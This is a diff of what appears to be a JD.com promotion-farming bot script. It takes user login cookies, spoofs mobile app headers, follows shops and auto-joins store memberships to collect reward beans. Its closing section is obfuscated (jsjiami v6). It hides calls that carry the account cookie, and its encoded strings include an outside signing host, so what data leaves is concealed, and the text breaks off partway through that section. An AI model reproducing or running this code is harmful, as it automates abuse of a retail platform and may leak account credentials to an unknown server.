京豆。` - } - } - } - // if (message !== '') { - // if ($.isNode()) { - // await notify.sendNotify($.name, message, '', `\n`); - // } else { - // $.msg($.name, '有点儿收获', message); - // } - // } -})() - .catch((e) => { - $.log('', `❌ ${$.name}, 失败! 原因: ${e}!`, '') - }) - .finally(() => { - $.done(); - }) - - -async function marry() { - $.log('那就开始吧。') - $.token = null; - $.secretPin = null; - $.openCardActivityId = null - await getFirstLZCK() - await getToken(); - if ($.token) { - await getMyPing(); - if ($.secretPin) { - console.log("去助力 -> "+$.authorCode) - await task('common/accessLogWithAD', `venderId=${$.activityShopId}&code=99&pin=${encodeURIComponent($.secretPin)}&activityId=${$.activityId}&pageUrl=${$.activityUrl}&subType=app&adSource=null`, 1); - await task('wxActionCommon/getUserInfo', `pin=${encodeURIComponent($.secretPin)}`, 1) - if ($.index === 1) { - await task('dz/openCard/activityContent', `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}&pinImg=&nick=${encodeURIComponent($.pin)}&cjyxPin=&cjhyPin=&shareUuid=${encodeURIComponent($.authorCode)}`, 0, 1) - } else { - await task('dz/openCard/activityContent', `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}&pinImg=&nick=${encodeURIComponent($.pin)}&cjyxPin=&cjhyPin=&shareUuid=${encodeURIComponent($.authorCode)}`) - } - await task('dz/openCard/checkOpenCard', `activityId=${$.activityId}&actorUuid=${$.actorUuid}&shareUuid=${$.authorCode}&pin=${encodeURIComponent($.secretPin)}`) - $.log("->关注店铺") - if ($.shopTask) { - if (!$.shopTask.allStatus) { - await task('dz/openCard/followShop', `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}&actorUuid=${encodeURIComponent($.actorUuid)}&taskType=23&taskValue=1000002520`) - } else { - $.log(" >>>已经关注过了\n") - await $.wait(2000) - // return - } - } else { - $.log("没有获取到对应的任务。\n") - } - $.log("->->->> 加入店铺会员") - if ($.openCardStatus) { - t1TaskList = [] - $.openCardStatus.cardList1.filter((x) => { if (x.status === 0) { t1TaskList.push(x) } }) - t2TaskList = [] - $.openCardStatus.cardList2.filter((x) => { if (x.status === 0) { t2TaskList.push(x) } }) - if (t1TaskList.length < 1) { - console.log(" >>>已经完成入会任务") - - } else { - for (const vo of t1TaskList) { - $.log(` >>>去加入${vo.name}`) - await getShopOpenCardInfo({ "venderId": `${vo.value}`, "channel": "401" }, vo.value) - await bindWithVender({ "venderId": `${vo.value}`, "bindByVerifyCodeFlag": 1, "registerExtend": {}, "writeChildFlag": 0, "activityId": $.openCardActivityId, "channel": 401 }, vo.value) - await $.wait(500) - } - for (const vo of t2TaskList) { - $.log(` >>>${vo.name}`) - await getShopOpenCardInfo({ "venderId": `${vo.value}`, "channel": "401" }) - await bindWithVender({ "venderId": `${vo.value}`, "bindByVerifyCodeFlag": 1, "registerExtend": {}, "writeChildFlag": 0, "activityId": $.openCardActivityId, "channel": 401 }, vo.value) - await $.wait(500) - } - } - - await task("taskact/openCardcommon/drawContent", `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}`) - await $.wait(1000) - await task('dz/openCard/checkOpenCard', `activityId=${$.activityId}&actorUuid=${$.actorUuid}&shareUuid=${$.authorCode}&pin=${encodeURIComponent($.secretPin)}`) - // await $.wait(2000) - // await task("dz/openCard/startDraw", `activityId=${$.activityId}&actorUuid=${$.actorUuid}&type=1&pin=${encodeURIComponent($.secretPin)}`) - // await $.wait(2000) - // await task("dz/openCard/startDraw", `activityId=${$.activityId}&actorUuid=${$.actorUuid}&type=2&pin=${encodeURIComponent($.secretPin)}`) - - } else { - $.log("没有获取到对应的任务。\n") - } - // $.log("->->->> 加购物车") - // await task("dz/openCard/saveTask", `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}&actorUuid=${$.actorUuid}&type=2&taskValue=10036669682406`) - } - } -} - -function task(function_id, body, isCommon = 0, own = 0) { - return new Promise(resolve => { - $.post(taskUrl(function_id, body, isCommon), async (err, resp, data) => { - try { - if (err) { - $.log(err) - } else { - - if (data) { - data = JSON.parse(data); - if (data.result) { - switch (function_id) { - case 'wxActionCommon/getUserInfo': - break; - case 'dz/openCard/activityContent': - if (!data.data.hasEnd) { - $.log(`开启【${data.data.activityName}】活动`) - $.log("-------------------") - if ($.index === 1) { - ownCode = data.data.actorUuid - console.log(ownCode) - } - $.actorUuid = data.data.actorUuid; - $.skuTask = data.data.addSku; - $.shopTask = data.data.followShop; - } else { - $.log("活动已经结束"); - } - break; - case 'dz/openCard/checkOpenCard': - $.openCardStatus = data.data; - break; - case 'dz/openCard/saveTask': - console.log(data.data.addBeanNum) - break; - case 'dz/openCard/saveTask': - if (data.data) { - if (data.data.addBeanNum) { - $.bean += data.data.addBeanNum; - $.log(`==>获得【${data.data.addBeanNum}】京豆\n`) - } - } - break; - case 'dz/openCard/startDraw': - if (data.data.drawOk) { - switch (data.data.drawInfo.type) { - case 6: - $.bean += data.data.drawInfo.beanNum; - $.log(`==>获得【${data.data.drawInfo.beanNum}】京豆\n`) - break; - default: - if ($.isNode()) { - await notify.sendNotify("中奖了", `中奖信息:${JSON.stringify(data.data.drawInfo)}\n活动链接:${$.activityUrl}`) - } else { - $.msg("中奖了", `获得${data.data.drawInfo.name}`, `中奖信息:${JSON.stringify(data.data.drawInfo)}\n活动链接:${$.activityUrl}`) - } - break; - } - } - break; - case 'crm/pageVisit/insertCrmPageVisit': - $.log("==> 上报成功") - - case 'dz/openCard/followShop': - if (data.data) { - if (data.data.addBeanNum) { - $.bean += data.data.addBeanNum; - $.log(`==>获得【${data.data.addBeanNum}】京豆\n`) - } - } - break; - - break; - default: - $.log(JSON.stringify(data)) - break; - } - } else { - $.log(JSON.stringify(data)) - } - } else { - // $.log("京东没有返回数据") - } - } - } catch (error) { - $.log(error) - } finally { - resolve(); - } - }) - }) -} -function taskUrl(function_id, body, isCommon) { - return { - url: isCommon ? `https://lzdz1-isv.isvjd.com/${function_id}` : `https://lzdz1-isv.isvjd.com/dingzhi/${function_id}`, - headers: { - Host: 'lzdz1-isv.isvjd.com', - Accept: 'application/json', - 'X-Requested-With': 'XMLHttpRequest', - 'Accept-Language': 'zh-cn', - 'Accept-Encoding': 'gzip, deflate, br', - 'Content-Type': 'application/x-www-form-urlencoded', - Origin: 'https://lzdz1-isv.isvjd.com', - 'User-Agent': `jdapp;iPhone;9.5.4;13.6;${$.UUID};network/wifi;ADID/${$.ADID};model/iPhone10,3;addressid/0;appBuild/167668;jdSupportDarkMode/0;Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148;supportJDSHWK/1`, - Connection: 'keep-alive', - Referer: $.activityUrl, - Cookie: $.cookie - }, - body: body - - } -} -function getAuthorCodeList(url) { - return new Promise(resolve => { - const options = { - url: `${url}?${new Date()}`, "timeout": 10000, headers: { - "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Edg/87.0.4280.88" - } - }; - $.get(options, async (err, resp, data) => { - try { - if (err) { - $.log(err) - } else { - if (data) data = JSON.parse(data) - } - } catch (e) { - $.logErr(e, resp) - data = null; - } finally { - resolve(data); - } - }) - }) -} -function getMyPing() { - let opt = { - url: `https://lzdz1-isv.isvjd.com/customer/getMyPing`, - headers: { - Host: 'lzdz1-isv.isvjd.com', - Accept: 'application/json', - 'X-Requested-With': 'XMLHttpRequest', - 'Accept-Language': 'zh-cn', - 'Accept-Encoding': 'gzip, deflate, br', - 'Content-Type': 'application/x-www-form-urlencoded', - Origin: 'https://lzdz1-isv.isvjd.com', - 'User-Agent': `jdapp;iPhone;9.5.4;13.6;${$.UUID};network/wifi;ADID/${$.ADID};model/iPhone10,3;addressid/0;appBuild/167668;jdSupportDarkMode/0;Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148;supportJDSHWK/1`, - Connection: 'keep-alive', - Referer: $.activityUrl, - Cookie: cookie, - }, - body: `userId=${$.activityShopId}&token=${$.token}&fromType=APP&riskType=1` - } - return new Promise(resolve => { - $.post(opt, (err, resp, data) => { - try { - if (err) { - $.log(err) - } else { - if (resp['headers']['set-cookie']) { - cookie = `${originCookie}` - if ($.isNode()) { - for (let sk of resp['headers']['set-cookie']) { - cookie = `${cookie}${sk.split(";")[0]};` - } - } else { - for (let ck of resp['headers']['Set-Cookie'].split(',')) { - cookie = `${cookie}${ck.split(";")[0]};` - } - } - } - if (resp['headers']['Set-Cookie']) { - cookie = `${originCookie}` - if ($.isNode()) { - for (let sk of resp['headers']['set-cookie']) { - cookie = `${cookie}${sk.split(";")[0]};` - } - } else { - for (let ck of resp['headers']['Set-Cookie'].split(',')) { - cookie = `${cookie}${ck.split(";")[0]};` - } - } - } - if (data) { - data = JSON.parse(data) - if (data.result) { - $.log(`你好:${data.data.nickname}`) - $.pin = data.data.nickname; - $.secretPin = data.data.secretPin; - cookie = `${cookie};AUTH_C_USER=${data.data.secretPin}` - } else { - $.log(data.errorMessage) - } - } else { - // $.log("京东返回了空数据") - } - } - } catch (error) { - $.log(error) - } finally { - resolve(); - } - - }) - }) -} -function getFirstLZCK() { - return new Promise(resolve => { - $.get({ url: $.activityUrl }, (err, resp, data) => { - try { - if (err) { - console.log(err) - } else { - if (resp['headers']['set-cookie']) { - cookie = `${originCookie}` - if ($.isNode()) { - for (let sk of resp['headers']['set-cookie']) { - cookie = `${cookie}${sk.split(";")[0]};` - } - } else { - for (let ck of resp['headers']['Set-Cookie'].split(',')) { - cookie = `${cookie}${ck.split(";")[0]};` - } - } - } - if (resp['headers']['Set-Cookie']) { - cookie = `${originCookie}` - if ($.isNode()) { - for (let sk of resp['headers']['set-cookie']) { - cookie = `${cookie}${sk.split(";")[0]};` - } - } else { - for (let ck of resp['headers']['Set-Cookie'].split(',')) { - cookie = `${cookie}${ck.split(";")[0]};` - } - } - } - $.cookie = cookie - } - } catch (error) { - console.log(error) - } finally { - resolve(); - } - }) - }) -} -function getToken() { - let opt = { - url: `https://api.m.jd.com/client.action?functionId=isvObfuscator`, - headers: { - Host: 'api.m.jd.com', - 'Content-Type': 'application/x-www-form-urlencoded', - Accept: '*/*', - Connection: 'keep-alive', - Cookie: cookie, - 'User-Agent': 'JD4iPhone/167650 (iPhone; iOS 13.7; Scale/3.00)', - 'Accept-Language': 'zh-Hans-CN;q=1', - 'Accept-Encoding': 'gzip, deflate, br', - }, - body: `body=%7B%22url%22%3A%20%22https%3A//lzkj-isv.isvjcloud.com%22%2C%20%22id%22%3A%20%22%22%7D&uuid=hjudwgohxzVu96krv&client=apple&clientVersion=9.4.0&st=1620476162000&sv=111&sign=f9d1b7e3b943b6a136d54fe4f892af05` - } - return new Promise(resolve => { - $.post(opt, (err, resp, data) => { - try { - if (err) { - $.log(err) - } else { - if (data) { - data = JSON.parse(data); - if (data.code === "0") { - $.token = data.token - } - } else { - $.log("京东返回了空数据") - } - } - } catch (error) { - $.log(error) - } finally { - resolve(); - } - }) - }) -} -function random(min, max) { - - return Math.floor(Math.random() * (max - min)) + min; - -} -function getUUID(format = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx', UpperCase = 0) { - return format.replace(/[xy]/g, function (c) { - var r = Math.random() * 16 | 0, v = c == 'x' ? r : (r & 0x3 | 0x8); - if (UpperCase) { - uuid = v.toString(36).toUpperCase(); - } else { - uuid = v.toString(36) - } - return uuid; - }); -} -function checkCookie() { - const options = { - url: "https://me-api.jd.com/user_new/info/GetJDUserInfoUnion", - headers: { - "Host": "me-api.jd.com", - "Accept": "*/*", - "Connection": "keep-alive", - "Cookie": cookie, - "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Mobile/15E148 Safari/604.1", - "Accept-Language": "zh-cn", - "Referer": "https://home.m.jd.com/myJd/newhome.action?sceneval=2&ufc=&", - "Accept-Encoding": "gzip, deflate, br", - } - }; - return new Promise(resolve => { - $.get(options, (err, resp, data) => { - try { - if (err) { - $.logErr(err) - } else { - if (data) { - data = JSON.parse(data); - if (data.retcode === "1001") { - $.isLogin = false; //cookie过期 - return; - } - if (data.retcode === "0" && data.data.hasOwnProperty("userInfo")) { - $.nickName = data.data.userInfo.baseInfo.nickname; - } - } else { - $.log('京东返回了空数据'); - } - } - } catch (e) { - $.logErr(e) - } finally { - resolve(); - } - }) - }) -} -// prettier-ignore -var _0xod7='jsjiami.com.v6',_0xod7_=['‮_0xod7'],_0x1acd=[_0xod7,'\x53\x33\x4a\x54\x56\x32\x4d\x3d','\x54\x47\x4e\x4c\x62\x6e\x6b\x3d','\x62\x47\x39\x6e','\x63\x47\x46\x79\x63\x32\x55\x3d','\x63\x33\x56\x6a\x59\x32\x56\x7a\x63\x77\x3d\x3d','\x63\x6d\x56\x7a\x64\x57\x78\x30','\x61\x57\x35\x30\x5a\x58\x4a\x6c\x63\x33\x52\x7a\x55\x6e\x56\x73\x5a\x55\x78\x70\x63\x33\x51\x3d','\x62\x33\x42\x6c\x62\x6b\x4e\x68\x63\x6d\x52\x42\x59\x33\x52\x70\x64\x6d\x6c\x30\x65\x55\x6c\x6b','\x61\x57\x35\x30\x5a\x58\x4a\x6c\x63\x33\x52\x7a\x53\x57\x35\x6d\x62\x77\x3d\x3d','\x59\x57\x4e\x30\x61\x58\x5a\x70\x64\x48\x6c\x4a\x5a\x41\x3d\x3d','\x56\x45\x56\x4a\x59\x57\x38\x3d','\x55\x6d\x78\x6d\x59\x32\x4d\x3d','\x63\x45\x39\x31\x52\x6b\x4d\x3d','\x64\x6e\x5a\x75\x57\x45\x4d\x3d','\x62\x33\x64\x32\x5a\x47\x55\x3d','\x59\x33\x70\x4b\x62\x47\x67\x3d','\x51\x55\x64\x59\x59\x30\x6b\x3d','\x54\x30\x4a\x58\x55\x45\x59\x3d','\x56\x57\x6c\x55\x51\x33\x63\x3d','\x59\x6d\x6c\x75\x5a\x46\x64\x70\x64\x47\x68\x57\x5a\x57\x35\x6b\x5a\x58\x49\x3d','\x52\x57\x52\x36\x62\x57\x67\x3d','\x55\x48\x56\x58\x62\x6b\x59\x3d','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x68\x63\x47\x6b\x75\x62\x53\x35\x71\x5a\x43\x35\x6a\x62\x32\x30\x76\x59\x32\x78\x70\x5a\x57\x35\x30\x4c\x6d\x46\x6a\x64\x47\x6c\x76\x62\x6a\x38\x3d','\x52\x33\x5a\x75\x55\x6c\x55\x3d','\x52\x6c\x5a\x71\x53\x30\x55\x3d','\x56\x47\x35\x69\x63\x30\x73\x3d','\x61\x6e\x6c\x47\x54\x31\x41\x3d','\x66\x53\x5a\x6a\x61\x47\x46\x75\x62\x6d\x56\x73\x50\x54\x51\x77\x4d\x53\x5a\x79\x5a\x58\x52\x31\x63\x6d\x35\x56\x63\x6d\x77\x39','\x59\x55\x78\x36\x61\x31\x63\x3d','\x56\x6d\x74\x75\x62\x33\x51\x3d','\x54\x56\x6c\x6f\x54\x45\x4d\x3d','\x62\x58\x64\x34\x52\x47\x30\x3d','\x65\x6c\x5a\x70\x59\x57\x34\x3d','\x52\x55\x46\x4a\x51\x6b\x45\x3d','\x53\x57\x70\x7a\x59\x6b\x6f\x3d','\x56\x55\x74\x79\x61\x46\x55\x3d','\x56\x32\x74\x69\x53\x45\x77\x3d','\x54\x46\x4a\x49\x61\x6b\x77\x3d','\x54\x30\x4e\x44\x54\x6e\x63\x3d','\x56\x31\x70\x7a\x57\x56\x6f\x3d','\x56\x33\x4e\x72\x63\x48\x67\x3d','\x61\x56\x42\x6b\x5a\x58\x67\x3d','\x51\x6e\x64\x6c\x55\x31\x63\x3d','\x65\x57\x35\x5a\x63\x58\x49\x3d','\x63\x47\x74\x50\x64\x58\x4d\x3d','\x57\x6d\x56\x5a\x62\x6c\x67\x3d','\x61\x56\x68\x4e\x54\x33\x6b\x3d','\x62\x56\x5a\x33\x65\x56\x67\x3d','\x55\x47\x4a\x50\x51\x55\x49\x3d','\x54\x33\x68\x74\x56\x57\x59\x3d','\x62\x55\x31\x52\x61\x33\x59\x3d','\x53\x57\x4a\x45\x62\x56\x45\x3d','\x59\x6d\x6c\x75\x5a\x46\x64\x70\x64\x47\x68\x57\x5a\x57\x35\x6b\x5a\x58\x4a\x74\x5a\x58\x4e\x7a\x59\x57\x64\x6c','\x62\x57\x56\x7a\x63\x32\x46\x6e\x5a\x51\x3d\x3d','\x5a\x57\x35\x32','\x55\x30\x6c\x48\x54\x6c\x39\x56\x55\x6b\x77\x3d','\x59\x6d\x52\x6e\x63\x30\x30\x3d','\x57\x6b\x74\x34\x53\x6b\x34\x3d','\x59\x30\x56\x51\x63\x6d\x4d\x3d','\x65\x45\x64\x72\x54\x47\x38\x3d','\x5a\x45\x74\x57\x64\x6d\x67\x3d','\x51\x58\x68\x73\x63\x6d\x6f\x3d','\x4f\x47\x46\x6b\x5a\x6d\x49\x3d','\x61\x6d\x52\x66\x63\x32\x68\x76\x63\x46\x39\x74\x5a\x57\x31\x69\x5a\x58\x49\x3d','\x4f\x53\x34\x79\x4c\x6a\x41\x3d','\x61\x6d\x52\x7a\x61\x57\x64\x75\x4c\x6d\x4e\x6d','\x59\x58\x42\x77\x62\x47\x6c\x6a\x59\x58\x52\x70\x62\x32\x34\x76\x61\x6e\x4e\x76\x62\x67\x3d\x3d','\x64\x6c\x6c\x43\x5a\x45\x67\x3d','\x51\x6b\x31\x47\x61\x33\x6b\x3d','\x61\x58\x56\x36\x61\x31\x45\x3d','\x5a\x30\x68\x33\x52\x58\x6f\x3d','\x55\x32\x56\x4d\x52\x6e\x45\x3d','\x52\x57\x35\x59\x65\x6c\x6b\x3d','\x55\x48\x70\x34\x63\x55\x67\x3d','\x54\x6c\x52\x42\x55\x56\x41\x3d','\x61\x30\x56\x78\x65\x6e\x45\x3d','\x61\x6c\x5a\x59\x63\x48\x45\x3d','\x51\x57\x31\x4f\x63\x6b\x6b\x3d','\x63\x57\x6c\x43\x64\x32\x63\x3d','\x5a\x6d\x78\x76\x62\x33\x49\x3d','\x62\x46\x6c\x57\x65\x47\x73\x3d','\x63\x6d\x46\x75\x5a\x47\x39\x74','\x62\x47\x56\x75\x5a\x33\x52\x6f','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x6a\x5a\x47\x34\x75\x62\x6e\x6f\x75\x62\x48\x55\x76\x5a\x32\x56\x30\x61\x44\x56\x7a\x64\x41\x3d\x3d','\x52\x47\x5a\x61\x62\x32\x67\x3d','\x57\x45\x4e\x36\x62\x6e\x59\x3d','\x63\x47\x39\x7a\x64\x41\x3d\x3d','\x53\x6b\x64\x4a\x53\x6b\x6f\x3d','\x59\x30\x78\x31\x57\x56\x63\x3d','\x53\x6d\x56\x74\x64\x6b\x67\x3d','\x56\x46\x4e\x6c\x59\x55\x59\x3d','\x5a\x6c\x64\x6d\x54\x31\x51\x3d','\x59\x58\x42\x77\x62\x48\x6b\x3d','\x65\x6b\x39\x49\x64\x45\x67\x3d','\x56\x46\x70\x75\x51\x6d\x6f\x3d','\x62\x47\x39\x6e\x52\x58\x4a\x79','\x61\x30\x64\x42\x55\x55\x51\x3d','\x56\x46\x6c\x48\x57\x48\x6f\x3d','\x59\x58\x42\x70\x4c\x6d\x30\x75\x61\x6d\x51\x75\x59\x32\x39\x74','\x4b\x69\x38\x71','\x61\x32\x56\x6c\x63\x43\x31\x68\x62\x47\x6c\x32\x5a\x51\x3d\x3d','\x65\x6d\x67\x74\x59\x32\x34\x3d','\x5a\x33\x70\x70\x63\x43\x77\x67\x5a\x47\x56\x6d\x62\x47\x46\x30\x5a\x53\x77\x67\x59\x6e\x49\x3d','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x68\x63\x47\x6b\x75\x62\x53\x35\x71\x5a\x43\x35\x6a\x62\x32\x30\x76\x59\x32\x78\x70\x5a\x57\x35\x30\x4c\x6d\x46\x6a\x64\x47\x6c\x76\x62\x6a\x39\x68\x63\x48\x42\x70\x5a\x44\x31\x71\x5a\x46\x39\x7a\x61\x47\x39\x77\x58\x32\x31\x6c\x62\x57\x4a\x6c\x63\x69\x5a\x6d\x64\x57\x35\x6a\x64\x47\x6c\x76\x62\x6b\x6c\x6b\x50\x57\x64\x6c\x64\x46\x4e\x6f\x62\x33\x42\x50\x63\x47\x56\x75\x51\x32\x46\x79\x5a\x45\x6c\x75\x5a\x6d\x38\x6d\x59\x6d\x39\x6b\x65\x54\x30\x3d','\x65\x47\x52\x75\x51\x6c\x49\x3d','\x63\x33\x52\x79\x61\x57\x35\x6e\x61\x57\x5a\x35','\x4a\x6d\x4e\x73\x61\x57\x56\x75\x64\x44\x31\x49\x4e\x53\x5a\x6a\x62\x47\x6c\x6c\x62\x6e\x52\x57\x5a\x58\x4a\x7a\x61\x57\x39\x75\x50\x54\x6b\x75\x4d\x69\x34\x77\x4a\x6e\x56\x31\x61\x57\x51\x39\x4f\x44\x67\x34\x4f\x44\x67\x3d','\x55\x6b\x70\x46\x55\x33\x6f\x3d','\x62\x48\x5a\x6c\x64\x6e\x67\x3d','\x59\x31\x68\x71\x63\x6e\x41\x3d','\x61\x6d\x52\x68\x63\x48\x41\x37\x61\x56\x42\x6f\x62\x32\x35\x6c\x4f\x7a\x6b\x75\x4e\x53\x34\x30\x4f\x7a\x45\x7a\x4c\x6a\x59\x37','\x56\x56\x56\x4a\x52\x41\x3d\x3d','\x4f\x32\x35\x6c\x64\x48\x64\x76\x63\x6d\x73\x76\x64\x32\x6c\x6d\x61\x54\x74\x42\x52\x45\x6c\x45\x4c\x77\x3d\x3d','\x51\x55\x52\x4a\x52\x41\x3d\x3d','\x4f\x32\x31\x76\x5a\x47\x56\x73\x4c\x32\x6c\x51\x61\x47\x39\x75\x5a\x54\x45\x77\x4c\x44\x4d\x37\x59\x57\x52\x6b\x63\x6d\x56\x7a\x63\x32\x6c\x6b\x4c\x7a\x41\x37\x59\x58\x42\x77\x51\x6e\x56\x70\x62\x47\x51\x76\x4d\x54\x59\x33\x4e\x6a\x59\x34\x4f\x32\x70\x6b\x55\x33\x56\x77\x63\x47\x39\x79\x64\x45\x52\x68\x63\x6d\x74\x4e\x62\x32\x52\x6c\x4c\x7a\x41\x37\x54\x57\x39\x36\x61\x57\x78\x73\x59\x53\x38\x31\x4c\x6a\x41\x67\x4b\x47\x6c\x51\x61\x47\x39\x75\x5a\x54\x73\x67\x51\x31\x42\x56\x49\x47\x6c\x51\x61\x47\x39\x75\x5a\x53\x42\x50\x55\x79\x41\x78\x4d\x31\x38\x32\x49\x47\x78\x70\x61\x32\x55\x67\x54\x57\x46\x6a\x49\x45\x39\x54\x49\x46\x67\x70\x49\x45\x46\x77\x63\x47\x78\x6c\x56\x32\x56\x69\x53\x32\x6c\x30\x4c\x7a\x59\x77\x4e\x53\x34\x78\x4c\x6a\x45\x31\x49\x43\x68\x4c\x53\x46\x52\x4e\x54\x43\x77\x67\x62\x47\x6c\x72\x5a\x53\x42\x48\x5a\x57\x4e\x72\x62\x79\x6b\x67\x54\x57\x39\x69\x61\x57\x78\x6c\x4c\x7a\x45\x31\x52\x54\x45\x30\x4f\x44\x74\x7a\x64\x58\x42\x77\x62\x33\x4a\x30\x53\x6b\x52\x54\x53\x46\x64\x4c\x4c\x7a\x45\x3d','\x61\x57\x4a\x49\x5a\x48\x45\x3d','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x7a\x61\x47\x39\x77\x62\x57\x56\x74\x59\x6d\x56\x79\x4c\x6d\x30\x75\x61\x6d\x51\x75\x59\x32\x39\x74\x4c\x33\x4e\x6f\x62\x33\x42\x6a\x59\x58\x4a\x6b\x4c\x7a\x39\x32\x5a\x57\x35\x6b\x5a\x58\x4a\x4a\x5a\x44\x30\x3d','\x66\x53\x5a\x6a\x61\x47\x46\x75\x62\x6d\x56\x73\x50\x54\x67\x77\x4d\x53\x5a\x79\x5a\x58\x52\x31\x63\x6d\x35\x56\x63\x6d\x77\x39','\x59\x57\x4e\x30\x61\x58\x5a\x70\x64\x48\x6c\x56\x63\x6d\x77\x3d','\x5a\x55\x64\x48\x65\x6e\x67\x3d','\x61\x58\x46\x34\x57\x55\x38\x3d','\x59\x56\x52\x6b\x65\x6d\x55\x3d','\x62\x56\x52\x51\x65\x55\x63\x3d','\x5a\x32\x56\x30','\x6a\x6b\x73\x6a\x45\x69\x48\x61\x6d\x69\x64\x53\x2e\x63\x54\x6f\x6d\x43\x2e\x76\x36\x68\x6c\x45\x45\x56\x50\x75\x56\x3d\x3d'];if(function(_0x47dca4,_0x2e45a0,_0x2d0d38){function _0x358c40(_0x4e0fee,_0x44d395,_0x5f1629,_0x6d2cae,_0x379df8,_0x59c1d4){_0x44d395=_0x44d395>>0x8,_0x379df8='po';var _0x24e0cd='shift',_0x197297='push',_0x59c1d4='‮';if(_0x44d395<_0x4e0fee){while(--_0x4e0fee){_0x6d2cae=_0x47dca4[_0x24e0cd]();if(_0x44d395===_0x4e0fee&&_0x59c1d4==='‮'&&_0x59c1d4['length']===0x1){_0x44d395=_0x6d2cae,_0x5f1629=_0x47dca4[_0x379df8+'p']();}else if(_0x44d395&&_0x5f1629['replace'](/[kEHdSTChlEEVPuV=]/g,'')===_0x44d395){_0x47dca4[_0x197297](_0x6d2cae);}}_0x47dca4[_0x197297](_0x47dca4[_0x24e0cd]());}return 0xdaf2e;};return _0x358c40(++_0x2e45a0,_0x2d0d38)>>_0x2e45a0^_0x2d0d38;}(_0x1acd,0x1d5,0x1d500),_0x1acd){_0xod7_=_0x1acd['length']^0x1d5;};function _0x27de(_0x4ab799,_0x2148e0){_0x4ab799=~~'0x'['concat'](_0x4ab799['slice'](0x1));var _0x38aa70=_0x1acd[_0x4ab799];if(_0x27de['HEabFd']===undefined&&'‮'['length']===0x1){(function(){var _0x48587b=function(){var _0x226fa7;try{_0x226fa7=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(_0x302471){_0x226fa7=window;}return _0x226fa7;};var _0x2dcb25=_0x48587b();var _0x5d0b0e='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x2dcb25['atob']||(_0x2dcb25['atob']=function(_0x41138d){var _0x37290e=String(_0x41138d)['replace'](/=+$/,'');for(var _0x1da2f9=0x0,_0x27e844,_0x496c4d,_0x55ec30=0x0,_0x46993b='';_0x496c4d=_0x37290e['charAt'](_0x55ec30++);~_0x496c4d&&(_0x27e844=_0x1da2f9%0x4?_0x27e844*0x40+_0x496c4d:_0x496c4d,_0x1da2f9++%0x4)?_0x46993b+=String['fromCharCode'](0xff&_0x27e844>>(-0x2*_0x1da2f9&0x6)):0x0){_0x496c4d=_0x5d0b0e['indexOf'](_0x496c4d);}return _0x46993b;});}());_0x27de['ciicrd']=function(_0x35e622){var _0x1ca022=atob(_0x35e622);var _0x460af0=[];for(var _0x27de2b=0x0,_0x1b5b31=_0x1ca022['length'];_0x27de2b<_0x1b5b31;_0x27de2b++){_0x460af0+='%'+('00'+_0x1ca022['charCodeAt'](_0x27de2b)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x460af0);};_0x27de['qeLOEi']={};_0x27de['HEabFd']=!![];}var _0x4e1a4f=_0x27de['qeLOEi'][_0x4ab799];if(_0x4e1a4f===undefined){_0x38aa70=_0x27de['ciicrd'](_0x38aa70);_0x27de['qeLOEi'][_0x4ab799]=_0x38aa70;}else{_0x38aa70=_0x4e1a4f;}return _0x38aa70;};function getShopOpenCardInfo(_0x2dfe13,_0x2a9c59){var _0x169e2b={'\x69\x71\x78\x59\x4f':function(_0x237960,_0x2865f7){return _0x237960===_0x2865f7;},'\x61\x54\x64\x7a\x65':_0x27de('‮0'),'\x6d\x54\x50\x79\x47':function(_0x5db734){return _0x5db734();},'\x78\x64\x6e\x42\x52':function(_0x27ef1f,_0x2696d1){return _0x27ef1f(_0x2696d1);},'\x52\x4a\x45\x53\x7a':_0x27de('‫1'),'\x6c\x76\x65\x76\x78':_0x27de('‫2'),'\x63\x58\x6a\x72\x70':_0x27de('‫3'),'\x69\x62\x48\x64\x71':_0x27de('‮4'),'\x65\x47\x47\x7a\x78':_0x27de('‫5')};let _0x4540b3={'\x75\x72\x6c':_0x27de('‮6')+_0x169e2b[_0x27de('‮7')](encodeURIComponent,JSON[_0x27de('‫8')](_0x2dfe13))+_0x27de('‮9'),'\x68\x65\x61\x64\x65\x72\x73':{'\x48\x6f\x73\x74':_0x169e2b[_0x27de('‮a')],'\x41\x63\x63\x65\x70\x74':_0x169e2b[_0x27de('‮b')],'\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e':_0x169e2b[_0x27de('‫c')],'\x43\x6f\x6f\x6b\x69\x65':cookie,'User-Agent':_0x27de('‫d')+$[_0x27de('‫e')]+_0x27de('‫f')+$[_0x27de('‫10')]+_0x27de('‫11'),'Accept-Language':_0x169e2b[_0x27de('‫12')],'\x52\x65\x66\x65\x72\x65\x72':_0x27de('‮13')+_0x2a9c59+_0x27de('‮14')+_0x169e2b[_0x27de('‮7')](encodeURIComponent,$[_0x27de('‫15')]),'Accept-Encoding':_0x169e2b[_0x27de('‮16')]}};return new Promise(_0x24d014=>{var _0x45d140={'\x4b\x72\x53\x57\x63':function(_0x564cc4,_0x316683){return 